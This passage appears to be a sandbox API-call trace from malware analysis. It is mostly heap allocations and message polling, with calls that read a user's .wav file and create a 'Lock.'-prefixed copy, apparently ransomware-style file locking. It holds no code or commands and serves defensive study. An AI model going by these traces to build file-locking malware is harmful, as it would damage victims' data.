dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.048] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.048] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.048] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.048] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.048] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HwKg28SMvdgN7pz7S.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hwkg28smvdgn7pz7s.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0252.049] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.049] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0252.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0252.049] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.049] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.049] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.HwKg28SMvdgN7pz7S.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.hwkg28smvdgn7pz7s.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0252.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0252.050] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0252.051] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.051] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.051] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0252.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.051] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0252.051] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x3fd3, lpOverlapped=0x0) returned 1 [0252.053] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0252.053] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0252.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3fd3) returned 0x34a4048 [0252.053] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.054] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0252.054] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0252.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0252.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3fd3) returned 0x34a4048 [0252.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3fd3) returned 0x34c6238 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0252.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.057] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0252.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0252.057] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.057] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0252.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0252.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.059] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.059] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.059] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.059] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.060] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.060] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.060] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.060] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.060] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: 